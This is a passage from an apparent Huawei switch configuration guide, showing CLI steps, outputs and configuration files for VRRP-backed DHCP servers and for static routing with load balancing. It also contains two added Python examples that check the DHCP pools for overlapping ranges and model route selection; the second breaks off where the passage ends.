[Switch-GigabitEthernet1/0/1] port hybrid pvid vlan 100
[Switch-GigabitEthernet1/0/1] port hybrid untagged vlan 100
[Switch-GigabitEthernet1/0/1] quit
[Switch] interface gigabitethernet 1/0/2
[Switch-GigabitEthernet1/0/2] port link-type hybrid
[Switch-GigabitEthernet1/0/2] port hybrid pvid vlan 100
[Switch-GigabitEthernet1/0/2] port hybrid untagged vlan 100
[Switch-GigabitEthernet1/0/2] quit
[Switch] interface gigabitethernet 1/0/3
[Switch-GigabitEthernet1/0/3] port link-type access
[Switch-GigabitEthernet1/0/3] port default vlan 100
[Switch-GigabitEthernet1/0/3] quit

Step 2 Create address pools and set corresponding attributes.

# Enable DHCP on SwitchA.
[SwitchA] dhcp enable

# Create an address pool on SwitchA and specify the IP address range 10.1.1.2 to 10.1.1.128,
which does not overlap with the IP address range of the address pool on SwitchB.

NOTE

Information about the address pool on the master DHCP server cannot be backed up to a backup DHCP
server in real time. To prevent IP address conflicts after a master/backup switchover, ensure that the
address pool ranges on the master and backup DHCP servers are exclusive to one another.
[SwitchA] ip pool 1
[SwitchA-ip-pool-1] network 10.1.1.0 mask 255.255.255.0
[SwitchA-ip-pool-1] gateway-list 10.1.1.111
[SwitchA-ip-pool-1] excluded-ip-address 10.1.1.1
[SwitchA-ip-pool-1] excluded-ip-address 10.1.1.129 10.1.1.254
[SwitchA-ip-pool-1] lease day 10
[SwitchA-ip-pool-1] quit

# Create an address pool on SwitchB and specify the IP address range 10.1.1.130 to
10.1.1.254, which does not overlap with the IP address range of the address pool on SwitchA.
[SwitchB] dhcp enable
[SwitchB] ip pool 1
[SwitchB-ip-pool-1] network 10.1.1.0 mask 255.255.255.0
[SwitchB-ip-pool-1] gateway-list 10.1.1.111
[SwitchB-ip-pool-1] excluded-ip-address 10.1.1.1 10.1.1.110
[SwitchB-ip-pool-1] excluded-ip-address 10.1.1.112 10.1.1.129
[SwitchB-ip-pool-1] lease day 10
[SwitchB-ip-pool-1] quit

Step 3 Configure a VRRP group.

# Create VRRP group 1 on SwitchA, set the priority of SwitchA in the VRRP group to 120,
and configure clients to obtain IP addresses from a global address pool.
[SwitchA] interface vlanif 100
[SwitchA-Vlanif100] vrrp vrid 1 virtual-ip 10.1.1.111
[SwitchA-Vlanif100] vrrp vrid 1 priority 120
[SwitchA-Vlanif100] dhcp select global
[SwitchA-Vlanif100] quit

# Create VRRP group 1 on SwitchB, set the priority of SwitchB in the VRRP group to 100
(default), and configure clients to obtain IP addresses from a global address pool.
[SwitchB] interface vlanif 100
[SwitchB-Vlanif100] vrrp vrid 1 virtual-ip 10.1.1.111
[SwitchB-Vlanif100] dhcp select global
[SwitchB-Vlanif100] quit

Step 4 Configure STP to prevent loops.

# Enable STP globally on Switch. The configurations on SwitchA and SwitchB are similar to the
configuration on Switch. For details, see the configuration files of SwitchA and SwitchB.
[Switch] stp enable

# Disable STP on GE1/0/3 of Switch, and set the path cost of GE1/0/1 to 20000.
[Switch] interface gigabitethernet 1/0/3
[Switch-GigabitEthernet1/0/3] stp disable
[Switch-GigabitEthernet1/0/3] quit
[Switch] interface gigabitethernet 1/0/1
[Switch-GigabitEthernet1/0/1] stp cost 20000
[Switch-GigabitEthernet1/0/1] quit

Step 5 Verify the configuration.

# Run the display vrrp command on SwitchA and SwitchB. The command output shows that
SwitchA is Master and SwitchB is Backup in the VRRP group.
[SwitchA] display vrrp
Vlanif100 | Virtual Router 1
State : Master
Virtual IP : 10.1.1.111
Master IP : 10.1.1.1
PriorityRun : 120
PriorityConfig : 120
MasterPriority : 120
Preempt : YES Delay Time : 0 s
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0101
Check TTL : YES
Config type : normal-vrrp
Backup-forward : disabled
Create time : 2012-01-12 20:15:46
Last change time : 2012-01-12 20:15:46
[SwitchB] display vrrp
Vlanif100 | Virtual Router 1
State : Backup
Virtual IP : 10.1.1.111
Master IP : 10.1.1.1
PriorityRun : 100
PriorityConfig : 100
MasterPriority : 120
Preempt : YES Delay Time : 0 s
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0101
Check TTL : YES
Config type : normal-vrrp
Backup-forward : disabled
Create time : 2012-01-12 20:15:46
Last change time : 2012-01-12 20:15:46

# Run the display ip pool command on SwitchA and SwitchB. The command output shows
that SwitchA, but not SwitchB, successfully allocated an IP address to the client.
[SwitchA] display ip pool
-----------------------------------------------------------------------------
Pool-name : 1
Pool-No : 0
Lease : 10 Days 0 Hours 0 Minutes
Position : Local Status : Unlocked
Gateway-0 : 10.1.1.111
Network : 10.1.1.0
Mask : 255.255.255.0
VPN instance : --
Address Statistic: Total :253 Used :1
Idle :125 Expired :0
Conflict :0 Disable :127

IP address Statistic
Total :253
Used :1 Idle :125
Expired :0 Conflict :0 Disable :127
[SwitchB] display ip pool
-----------------------------------------------------------------------------
Pool-name : 1
Pool-No : 0
Lease : 10 Days 0 Hours 0 Minutes
Position : Local Status : Unlocked
Gateway-0 : 10.1.1.111
Network : 10.1.1.0
Mask : 255.255.255.0
VPN instance : --
Address Statistic: Total :253 Used :0
Idle :125 Expired :0
Conflict :0 Disable :128

IP address Statistic
Total :253
Used :0 Idle :125
Expired :0 Conflict :0 Disable :128

# Run the shutdown command on GE1/0/2 and GE1/0/5 of SwitchA to simulate a fault.
[SwitchA] interface gigabitethernet 1/0/2
[SwitchA-GigabitEthernet1/0/2] shutdown
[SwitchA-GigabitEthernet1/0/2] quit
[SwitchA] interface gigabitethernet 1/0/5
[SwitchA-GigabitEthernet1/0/5] shutdown
[SwitchA-GigabitEthernet1/0/5] quit

# Run the display vrrp command on SwitchB to view the VRRP status. The command output
shows that SwitchB is Master.
[SwitchB] display vrrp
Vlanif100 | Virtual Router 1
State : Master
Virtual IP : 10.1.1.111
Master IP : 10.1.1.129
PriorityRun : 100
PriorityConfig : 100
MasterPriority : 100
Preempt : YES Delay Time : 0 s
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0101
Check TTL : YES
Config type : normal-vrrp
Backup-forward : disabled
Create time : 2012-01-12 20:15:46
Last change time : 2012-01-12 20:15:46

# Run the display ip pool command on SwitchB to view the address pool configuration.
[SwitchB] display ip pool
-----------------------------------------------------------------------------
Pool-name : 1
Pool-No : 0
Lease : 10 Days 0 Hours 0 Minutes
Position : Local Status : Unlocked
Gateway-0 : 10.1.1.111
Network : 10.1.1.0
Mask : 255.255.255.0
VPN instance : --
Address Statistic: Total :253 Used :1
Idle :124 Expired :0
Conflict :0 Disable :128

IP address Statistic
Total :253
Used :1 Idle :124
Expired :0 Conflict :0 Disable :128

----End

Configuration Files
- Configuration file of SwitchA
#
sysname SwitchA
#
vlan batch 100
#
dhcp enable
#
ip pool 1
gateway-list 10.1.1.111
network 10.1.1.0 mask 255.255.255.0
excluded-ip-address 10.1.1.1
excluded-ip-address 10.1.1.129 10.1.1.254
lease day 10 hour 0 minute 0
#
interface Vlanif100
ip address 10.1.1.1 255.255.255.0
vrrp vrid 1 virtual-ip 10.1.1.111
vrrp vrid 1 priority 120
dhcp select global
#
interface GigabitEthernet1/0/2
port link-type hybrid
port hybrid pvid vlan 100
port hybrid untagged vlan 100
#
interface GigabitEthernet1/0/5
port link-type hybrid
port hybrid pvid vlan 100
port hybrid untagged vlan 100
#
return

- Configuration file of SwitchB
#
sysname SwitchB
#
vlan batch 100
#
dhcp enable
#
ip pool 1
gateway-list 10.1.1.111
network 10.1.1.0 mask 255.255.255.0
excluded-ip-address 10.1.1.1 10.1.1.110
excluded-ip-address 10.1.1.112 10.1.1.129
lease day 10 hour 0 minute 0
#
interface Vlanif100
ip address 10.1.1.129 255.255.255.0
vrrp vrid 1 virtual-ip 10.1.1.111
dhcp select global
#
interface GigabitEthernet1/0/2
port link-type hybrid
port hybrid pvid vlan 100
port hybrid untagged vlan 100
#
interface GigabitEthernet1/0/5
port link-type hybrid
port hybrid pvid vlan 100
port hybrid untagged vlan 100
#
return

- Configuration file of Switch
#
sysname Switch
#
vlan batch 100
#
interface GigabitEthernet1/0/1
port link-type hybrid
port hybrid pvid vlan 100
port hybrid untagged vlan 100
stp instance 0 cost 20000
#
interface GigabitEthernet1/0/2
port link-type hybrid
port hybrid pvid vlan 100
port hybrid untagged vlan 100
#
interface GigabitEthernet1/0/3
port link-type access
port default vlan 100
stp disable
#
return
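The exclusive-range rule from the NOTE in Step 2, checked mechanically against the configuration files above, as an added Python example that is not part of the Huawei document: it parses the ip pool stanzas of SwitchA and SwitchB, reproduces the Total, Idle and Disable counters that display ip pool shows, and reports any address both servers could lease or any VLANIF or VRRP virtual address that a pool could hand out; parse_pool, leasable, pool_statistics and check_pools are this example's own names.

```python
"""Exclusive-range check for the master and backup DHCP address pools above.

Added example, not Huawei code.  It parses the ip pool stanzas copied from
the SwitchA and SwitchB configuration files, works out which addresses each
server can actually lease, and checks that the two sets are disjoint and that
neither server can lease a VLANIF or VRRP virtual address, as the NOTE in
Step 2 requires.  Only the pool commands used on this page are understood.
"""
import ipaddress
from typing import Dict, List, Set

IPv4 = ipaddress.IPv4Address

# Stanzas copied from the configuration files of SwitchA and SwitchB.
SWITCH_A_POOL = """
ip pool 1
 gateway-list 10.1.1.111
 network 10.1.1.0 mask 255.255.255.0
 excluded-ip-address 10.1.1.1
 excluded-ip-address 10.1.1.129 10.1.1.254
 lease day 10 hour 0 minute 0
"""
SWITCH_B_POOL = """
ip pool 1
 gateway-list 10.1.1.111
 network 10.1.1.0 mask 255.255.255.0
 excluded-ip-address 10.1.1.1 10.1.1.110
 excluded-ip-address 10.1.1.112 10.1.1.129
 lease day 10 hour 0 minute 0
"""
# Addresses that must never be leased: both VLANIF100 addresses and the VRRP virtual IP.
RESERVED = {IPv4("10.1.1.1"), IPv4("10.1.1.129"), IPv4("10.1.1.111")}


def ip_range(first: IPv4, last: IPv4) -> Set[IPv4]:
    """All addresses from first to last inclusive."""
    return {IPv4(n) for n in range(int(first), int(last) + 1)}


def parse_pool(stanza: str) -> Dict:
    """Read the network, gateway-list and excluded-ip-address lines of one ip pool stanza."""
    pool = {"name": None, "network": None, "gateways": set(), "excluded": set()}
    for line in stanza.splitlines():
        words = line.split()
        if words[:2] == ["ip", "pool"]:
            pool["name"] = words[2]
        elif words[:1] == ["network"]:                # network <address> mask <mask>
            pool["network"] = ipaddress.ip_network(f"{words[1]}/{words[3]}")
        elif words[:1] == ["gateway-list"]:
            pool["gateways"].update(IPv4(w) for w in words[1:])
        elif words[:1] == ["excluded-ip-address"]:    # one address or an inclusive range
            first = IPv4(words[1])
            last = IPv4(words[2]) if len(words) > 2 else first
            pool["excluded"] |= ip_range(first, last)
    if pool["network"] is None:
        raise ValueError("ip pool stanza has no network command")
    return pool


def leasable(pool: Dict) -> Set[IPv4]:
    """Addresses the server may hand out: the network's hosts minus gateways and exclusions."""
    return set(pool["network"].hosts()) - pool["gateways"] - pool["excluded"]


def pool_statistics(pool: Dict, used: int = 0) -> Dict[str, int]:
    """Counters as display ip pool reports them: the gateway is dropped from Total
    (253 for a /24) and excluded addresses inside the network count as Disable."""
    hosts = set(pool["network"].hosts())
    total = len(hosts - pool["gateways"])
    disable = len(pool["excluded"] & hosts)
    return {"Total": total, "Used": used, "Idle": total - disable - used, "Disable": disable}


def check_pools(pools: Dict[str, Dict], reserved: Set[IPv4] = RESERVED) -> List[str]:
    """Problems found; an empty list means the pools can safely act as master and backup."""
    problems = []
    names = list(pools)
    for i, a in enumerate(names):
        for b in names[i + 1:]:
            overlap = leasable(pools[a]) & leasable(pools[b])
            if overlap:   # both servers could lease the same address after a switchover
                problems.append(f"{a} and {b} can both lease {min(overlap)}-{max(overlap)}")
    for name, pool in pools.items():
        leaked = leasable(pool) & reserved
        if leaked:
            problems.append(f"{name} can lease reserved address(es) "
                            + ", ".join(str(ip) for ip in sorted(leaked)))
    return problems


if __name__ == "__main__":
    pools = {"SwitchA": parse_pool(SWITCH_A_POOL), "SwitchB": parse_pool(SWITCH_B_POOL)}
    for name, pool in pools.items():
        print(name, pool_statistics(pool, used=1 if name == "SwitchA" else 0))
    print("problems:", check_pools(pools) or "none")
```

Removing one excluded-ip-address line from the SwitchB stanza makes the check report both the overlapping range and the leaked VLANIF address 10.1.1.129.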

Relevant Information
Video
Configure DHCP Server and Relay


9 Typical Routing Configuration

About This Chapter

9.1 Typical Static Route Configuration
9.2 Typical OSPF Configuration
9.3 Typical PBR Configuration


9.1 Typical Static Route Configuration

9.1.1 Example for Configuring Static Routes for Interworking Between Different Network Segments

Static Route Overview
Static routes are manually configured by administrators. Static routes use less bandwidth than
dynamic routes and do not use CPU resources for route calculation and update analysis. When
a network fault occurs or the topology changes, static routes cannot be automatically updated
and must be manually reconfigured to adapt to the network change. Static routes have five
parameters: destination IP address, mask, outbound interface, next hop, and priority.
Static routes are easy to configure and control, and meet network requirements on a simple
network. On a complex network, static routes can also be configured to improve network
performance and ensure bandwidth for important applications.

Configuration Notes
- Communication between two devices is bidirectional, so reachable routes must be
available in both directions. To enable two devices to communicate through static routes,
configure a static route on the local device and then configure a return route on the peer
device.
- If an enterprise network has two egresses, two equal-cost static routes can be configured
for load balancing so that traffic is evenly balanced between the two links. Alternatively,
two non-equal-cost static routes can be configured for active/standby backup: when the
active link is faulty, traffic is switched from the active link to the standby link.

Networking Requirements
As shown in Figure 9-1, hosts on different network segments are connected through several
Switches. Any two hosts on different network segments must be able to communicate with each
other without using dynamic routing protocols.


Figure 9-1 Networking diagram of configuring static routes for interworking between
different network segments
[Figure: PC1 (10.1.1.2/24) - SwitchA GE1/0/2 (VLANIF30, 10.1.1.1/24); SwitchA GE1/0/1 (VLANIF10,
10.1.4.1/30) - SwitchB GE1/0/1 (VLANIF10, 10.1.4.2/30); SwitchB GE1/0/3 (VLANIF40, 10.1.2.1/24) -
PC2 (10.1.2.2/24); SwitchB GE1/0/2 (VLANIF20, 10.1.4.5/30) - SwitchC GE1/0/1 (VLANIF20,
10.1.4.6/30); SwitchC GE1/0/2 (VLANIF50, 10.1.3.1/24) - PC3 (10.1.3.2/24).]

Configuration Roadmap
The configuration roadmap is as follows:
1. Create VLANs, add interfaces to the VLANs, and assign IPv4 addresses to VLANIF
interfaces so that neighboring devices can communicate with each other.
2. Configure the IPv4 default gateway on each host, and configure IPv4 static routes or
default static routes on each Switch so that hosts on different network segments can
communicate with each other.

Procedure
Step 1 Create VLANs and add interfaces to the VLANs.
# Configure SwitchA. The configurations of SwitchB and SwitchC are similar to the
configuration of SwitchA.
<HUAWEI> system-view
[HUAWEI] sysname SwitchA
[SwitchA] vlan batch 10 30
[SwitchA] interface gigabitethernet 1/0/1
[SwitchA-GigabitEthernet1/0/1] port link-type trunk
[SwitchA-GigabitEthernet1/0/1] port trunk allow-pass vlan 10
[SwitchA-GigabitEthernet1/0/1] quit
[SwitchA] interface gigabitethernet 1/0/2
[SwitchA-GigabitEthernet1/0/2] port link-type access
[SwitchA-GigabitEthernet1/0/2] port default vlan 30
[SwitchA-GigabitEthernet1/0/2] quit

Step 2 Assign IPv4 addresses to the VLANIF interfaces.

# Configure SwitchA. The configurations of SwitchB and SwitchC are similar to the
configuration of SwitchA.
[SwitchA] interface vlanif 10
[SwitchA-Vlanif10] ip address 10.1.4.1 30
[SwitchA-Vlanif10] quit
[SwitchA] interface vlanif 30
[SwitchA-Vlanif30] ip address 10.1.1.1 24
[SwitchA-Vlanif30] quit

Step 3 Configure hosts.
Set the default gateway addresses of PC1, PC2, and PC3 to 10.1.1.1, 10.1.2.1, and 10.1.3.1
respectively.

Step 4 Configure static routes.
# Configure a default IPv4 route on SwitchA.
[SwitchA] ip route-static 0.0.0.0 0.0.0.0 10.1.4.2

# Configure two IPv4 static routes on SwitchB.
[SwitchB] ip route-static 10.1.1.0 255.255.255.0 10.1.4.1
[SwitchB] ip route-static 10.1.3.0 255.255.255.0 10.1.4.6

# Configure a default IPv4 route on SwitchC.
[SwitchC] ip route-static 0.0.0.0 0.0.0.0 10.1.4.5

Step 5 Verify the configuration.

# Check the IP routing table on SwitchA.
[SwitchA] display ip routing-table
Route Flags: R - relay, D - download to fib
------------------------------------------------------------------------------
Routing Tables: Public
Destinations : 7 Routes : 7

Destination/Mask    Proto   Pre  Cost      Flags NextHop         Interface

        0.0.0.0/0   Static  60   0          RD   10.1.4.2        Vlanif10
      10.1.1.0/24   Direct  0    0           D   10.1.1.1        Vlanif30
      10.1.1.1/32   Direct  0    0           D   127.0.0.1       Vlanif30
      10.1.4.0/30   Direct  0    0           D   10.1.4.1        Vlanif10
      10.1.4.1/32   Direct  0    0           D   127.0.0.1       Vlanif10
      127.0.0.0/8   Direct  0    0           D   127.0.0.1       InLoopBack0
     127.0.0.1/32   Direct  0    0           D   127.0.0.1       InLoopBack0

# Run the ping command to verify the connectivity.
[SwitchA] ping 10.1.3.1
PING 10.1.3.1: 56 data bytes, press CTRL_C to break
Reply from 10.1.3.1: bytes=56 Sequence=1 ttl=253 time=62 ms
Reply from 10.1.3.1: bytes=56 Sequence=2 ttl=253 time=63 ms
Reply from 10.1.3.1: bytes=56 Sequence=3 ttl=253 time=63 ms
Reply from 10.1.3.1: bytes=56 Sequence=4 ttl=253 time=62 ms
Reply from 10.1.3.1: bytes=56 Sequence=5 ttl=253 time=62 ms

--- 10.1.3.1 ping statistics ---
5 packet(s) transmitted
5 packet(s) received
0.00% packet loss
round-trip min/avg/max = 62/62/63 ms

# Run the tracert command to verify the connectivity.
[SwitchA] tracert 10.1.3.1
traceroute to 10.1.3.1(10.1.3.1), max hops: 30 ,packet length: 40,press CTRL_C to break
1 10.1.4.2 31 ms 32 ms 31 ms
2 10.1.3.1 62 ms 63 ms 62 ms

----End


Configuration Files
- Configuration file of SwitchA
#
sysname SwitchA
#
vlan batch 10 30
#
interface Vlanif10
ip address 10.1.4.1 255.255.255.252
#
interface Vlanif30
ip address 10.1.1.1 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 10
#
interface GigabitEthernet1/0/2
port link-type access
port default vlan 30
#
ip route-static 0.0.0.0 0.0.0.0 10.1.4.2
#
return

- Configuration file of SwitchB
#
sysname SwitchB
#
vlan batch 10 20 40
#
interface Vlanif10
ip address 10.1.4.2 255.255.255.252
#
interface Vlanif20
ip address 10.1.4.5 255.255.255.252
#
interface Vlanif40
ip address 10.1.2.1 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 10
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 20
#
interface GigabitEthernet1/0/3
port link-type access
port default vlan 40
#
ip route-static 10.1.1.0 255.255.255.0 10.1.4.1
ip route-static 10.1.3.0 255.255.255.0 10.1.4.6
#
return

- Configuration file of SwitchC
#
sysname SwitchC
#
vlan batch 20 50
#
interface Vlanif20
ip address 10.1.4.6 255.255.255.252
#
interface Vlanif50
ip address 10.1.3.1 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 20
#
interface GigabitEthernet1/0/2
port link-type access
port default vlan 50
#
ip route-static 0.0.0.0 0.0.0.0 10.1.4.5
#
return

Relevant Information
Video
How to Configure a Static Route
How to Configure a Default Route
How to Configure a Floating Static Route

9.1.2 Example for Configuring Static Routes for Load Balancing

Static Route Overview
Static routes are manually configured by administrators. Static routes use less bandwidth than
dynamic routes and do not use CPU resources for route calculation and update analysis. When
a network fault occurs or the topology changes, static routes cannot be automatically updated
and must be manually reconfigured to adapt to the network change. Static routes have five
parameters: destination IP address, mask, outbound interface, next hop, and priority.

Static routes are easy to configure and control, and meet network requirements on a simple
network. On a complex network, static routes can also be configured to improve network
performance and ensure bandwidth for important applications.

Configuration Notes
- Communication between two devices is bidirectional, so reachable routes must be
available in both directions. To enable two devices to communicate through static routes,
configure a static route on the local device and then configure a return route on the peer
device.
- If an enterprise network has two egresses, two equal-cost static routes can be configured
for load balancing so that traffic is evenly balanced between the two links. Alternatively,
two non-equal-cost static routes can be configured for active/standby backup: when the
active link is faulty, traffic is switched from the active link to the standby link.

Networking Requirements
On the network shown in Figure 9-2, PC1 and PC2 are connected through four Switches.
Data traffic can be transmitted from PC1 to PC2 through two links: PC1-SwitchA-SwitchB-
SwitchC-PC2 and PC1-SwitchA-SwitchD-SwitchC-PC2. To improve link efficiency, users
want to implement load balancing between the two links. That is, traffic from PC1 to PC2 is
evenly balanced between the two links. When faults occur on one of the two links, traffic is
automatically switched to the other link.


NOTE

In this scenario, ensure that all connected interfaces have STP disabled. If STP is enabled and VLANIF
interfaces of switches are used to construct a Layer 3 ring network, an interface on the network may be
blocked. As a result, Layer 3 services on the network cannot run normally.

Figure 9-2 Configuring static routes for load balancing
[Figure: PC1 (10.1.1.2) - SwitchA GE1/0/1 (VLANIF10, 10.1.1.1/24). Upper link: SwitchA GE1/0/2
(VLANIF100, 192.168.12.1/24) - SwitchB GE1/0/1 (VLANIF100, 192.168.12.2/24); SwitchB GE1/0/2
(VLANIF200, 192.168.23.1/24) - SwitchC GE1/0/2 (VLANIF200, 192.168.23.2/24). Lower link: SwitchA
GE1/0/3 (VLANIF400, 192.168.14.1/24) - SwitchD GE1/0/1 (VLANIF400, 192.168.14.2/24); SwitchD
GE1/0/2 (VLANIF300, 192.168.34.2/24) - SwitchC GE1/0/3 (VLANIF300, 192.168.34.1/24). SwitchC
GE1/0/1 (VLANIF20, 10.1.2.1/24) - PC2 (10.1.2.2).]

Configuration Roadmap
The configuration roadmap is as follows:
1. Create VLANs, add interfaces to the VLANs, and assign IP addresses to VLANIF
interfaces.
2. Configure static routes in two directions of data traffic.
3. Configure default gateways for hosts.

Procedure
Step 1 Specify the VLANs to which interfaces belong.
# Configure SwitchA. The configurations of SwitchB, SwitchC, and SwitchD are similar to
the configuration of SwitchA, and are not mentioned here.
<HUAWEI> system-view
[HUAWEI] sysname SwitchA
[SwitchA] vlan batch 10 100 400
[SwitchA] interface gigabitethernet 1/0/1
[SwitchA-GigabitEthernet1/0/1] port link-type access
[SwitchA-GigabitEthernet1/0/1] port default vlan 10
[SwitchA-GigabitEthernet1/0/1] quit
[SwitchA] interface gigabitethernet 1/0/2
[SwitchA-GigabitEthernet1/0/2] port link-type trunk
[SwitchA-GigabitEthernet1/0/2] port trunk allow-pass vlan 100
[SwitchA-GigabitEthernet1/0/2] quit
[SwitchA] interface gigabitethernet 1/0/3
[SwitchA-GigabitEthernet1/0/3] port link-type trunk
[SwitchA-GigabitEthernet1/0/3] port trunk allow-pass vlan 400
[SwitchA-GigabitEthernet1/0/3] quit

Step 2 Configure an IP address for each VLANIF interface.

# Configure SwitchA. The configurations of SwitchB, SwitchC, and SwitchD are similar to
the configuration of SwitchA, and are not mentioned here.
[SwitchA] interface vlanif 10
[SwitchA-Vlanif10] ip address 10.1.1.1 24
[SwitchA-Vlanif10] quit
[SwitchA] interface vlanif 100
[SwitchA-Vlanif100] ip address 192.168.12.1 24
[SwitchA-Vlanif100] quit
[SwitchA] interface vlanif 400
[SwitchA-Vlanif400] ip address 192.168.14.1 24
[SwitchA-Vlanif400] quit

Step 3 Configure hosts.
Assign IP address 10.1.1.2/24 and default gateway IP address 10.1.1.1 to PC1; assign IP
address 10.1.2.2/24 and default gateway IP address 10.1.2.1 to PC2.

Step 4 Configure static routes from PC1 to PC2.
# On SwitchA, configure two equal-cost static routes whose next hops point to SwitchB and
SwitchD respectively. This configuration implements load balancing for traffic from PC1 to
PC2.
[SwitchA] ip route-static 10.1.2.0 24 192.168.12.2
[SwitchA] ip route-static 10.1.2.0 24 192.168.14.2

# Configure SwitchB.
[SwitchB] ip route-static 10.1.2.0 24 192.168.23.2

# Configure SwitchD.
[SwitchD] ip route-static 10.1.2.0 24 192.168.34.1

Step 5 Configure static routes from PC2 to PC1.

# On SwitchC, configure two equal-cost static routes whose next hops point to SwitchB and
SwitchD respectively. This configuration implements load balancing for traffic from PC2 to
PC1.
[SwitchC] ip route-static 10.1.1.0 24 192.168.23.1
[SwitchC] ip route-static 10.1.1.0 24 192.168.34.2

# Configure SwitchB.
[SwitchB] ip route-static 10.1.1.0 24 192.168.12.1

# Configure SwitchD.
[SwitchD] ip route-static 10.1.1.0 24 192.168.14.1

Step 6 Verify the configuration.

# Check the IP routing table on SwitchA.
[SwitchA] display ip routing-table
Route Flags: R - relay, D - download to fib
------------------------------------------------------------------------------
Routing Tables: Public
Destinations : 9        Routes : 10

Destination/Mask    Proto   Pre  Cost      Flags NextHop         Interface

      10.1.1.0/24   Direct  0    0           D   10.1.1.1        Vlanif10
      10.1.1.1/32   Direct  0    0           D   127.0.0.1       Vlanif10
      10.1.2.0/24   Static  60   0          RD   192.168.12.2    Vlanif100
                    Static  60   0          RD   192.168.14.2    Vlanif400
      127.0.0.0/8   Direct  0    0           D   127.0.0.1       InLoopBack0
     127.0.0.1/32   Direct  0    0           D   127.0.0.1       InLoopBack0
   192.168.12.0/24  Direct  0    0           D   192.168.12.1    Vlanif100
   192.168.12.1/32  Direct  0    0           D   127.0.0.1       Vlanif100
   192.168.14.0/24  Direct  0    0           D   192.168.14.1    Vlanif400
   192.168.14.1/32  Direct  0    0           D   127.0.0.1       Vlanif400

The IP routing table on SwitchA contains two equal-cost routes to network segment
10.1.2.0/24. In this situation, data traffic is evenly balanced between two different links,
achieving load balancing.

----End

Configuration Files
- SwitchA configuration file
#
sysname SwitchA
#
vlan batch 10 100 400
#
interface Vlanif10
ip address 10.1.1.1 255.255.255.0
#
interface Vlanif100
ip address 192.168.12.1 255.255.255.0
#
interface Vlanif400
ip address 192.168.14.1 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type access
port default vlan 10
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 100
#
interface GigabitEthernet1/0/3
port link-type trunk
port trunk allow-pass vlan 400
#
ip route-static 10.1.2.0 255.255.255.0 192.168.12.2
ip route-static 10.1.2.0 255.255.255.0 192.168.14.2
#
return

- SwitchB configuration file
#
sysname SwitchB
#
vlan batch 100 200
#
interface Vlanif100
ip address 192.168.12.2 255.255.255.0
#
interface Vlanif200
ip address 192.168.23.1 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 100
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 200
#
ip route-static 10.1.1.0 255.255.255.0 192.168.12.1
ip route-static 10.1.2.0 255.255.255.0 192.168.23.2
#
return

- SwitchC configuration file
#
sysname SwitchC
#
vlan batch 20 200 300
#
interface Vlanif20
ip address 10.1.2.1 255.255.255.0
#
interface Vlanif200
ip address 192.168.23.2 255.255.255.0
#
interface Vlanif300
ip address 192.168.34.1 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type access
port default vlan 20
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 200
#
interface GigabitEthernet1/0/3
port link-type trunk
port trunk allow-pass vlan 300
#
ip route-static 10.1.1.0 255.255.255.0 192.168.23.1
ip route-static 10.1.1.0 255.255.255.0 192.168.34.2
#
return

- SwitchD configuration file
#
sysname SwitchD
#
vlan batch 300 400
#
interface Vlanif300
ip address 192.168.34.2 255.255.255.0
#
interface Vlanif400
ip address 192.168.14.2 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 400
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 300
#
ip route-static 10.1.1.0 255.255.255.0 192.168.14.1
ip route-static 10.1.2.0 255.255.255.0 192.168.34.1
#
return
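The route selection behind the display ip routing-table and tracert outputs of 9.1.1 and 9.1.2, as an added Python example that is not part of the Huawei document: it applies longest prefix match and route preference to the addresses of Figure 9-1 and Figure 9-2, keeps both equal-cost next hops of 9.1.2 active, and drops a static route whose next hop stops resolving through a Direct route when an interface goes down; Route, lookup, active_routes, next_hops, owner and trace are this example's own names, and the pre parameter goes beyond the page by also covering static routes with different preferences.

```python
"""Route-selection model for the static-route examples in 9.1.1 and 9.1.2.

Added example, not Huawei code.  It reproduces what display ip routing-table
and tracert show above: longest prefix match, lowest preference wins, equal-cost
Static routes stay active together (9.1.2), and a Static route drops out once
its next hop is no longer reachable through a Direct route (flag R, relay).
"""
import ipaddress
from dataclasses import dataclass
from typing import Dict, List, Set

IPv4 = ipaddress.IPv4Address


@dataclass(frozen=True)
class Route:
    prefix: ipaddress.IPv4Network
    proto: str      # "Direct" or "Static" (Proto column)
    pre: int        # preference (Pre column): Direct 0, Static 60 unless configured
    nexthop: IPv4   # for a Direct route, the interface's own address
    iface: str      # outbound interface; filled in for Static routes by active_routes


def direct(addr: str, iface: str) -> Route:
    """Direct route that an interface address such as 10.1.4.1/30 creates."""
    intf = ipaddress.ip_interface(addr)
    return Route(intf.network, "Direct", 0, intf.ip, iface)


def static(dst: str, nexthop: str, pre: int = 60) -> Route:
    """ip route-static <dst> <mask> <nexthop> [preference <pre>]."""
    return Route(ipaddress.ip_network(dst), "Static", pre, IPv4(nexthop), "")


def lookup(table: List[Route], dst: IPv4) -> List[Route]:
    """Longest prefix match, then lowest preference; the survivors are equal-cost."""
    matches = [r for r in table if dst in r.prefix]
    if not matches:
        return []
    longest = max(r.prefix.prefixlen for r in matches)
    best = [r for r in matches if r.prefix.prefixlen == longest]
    best_pre = min(r.pre for r in best)
    return [r for r in best if r.pre == best_pre]


def active_routes(table: List[Route], down: Set[str] = frozenset()) -> List[Route]:
    """Drop Direct routes of down interfaces, then keep only the Static routes
    whose next hop still resolves through a Direct route (recursive lookup)."""
    directs = [r for r in table if r.proto == "Direct" and r.iface not in down]
    active = list(directs)
    for r in table:
        if r.proto == "Static":
            via = lookup(directs, r.nexthop)
            if via:
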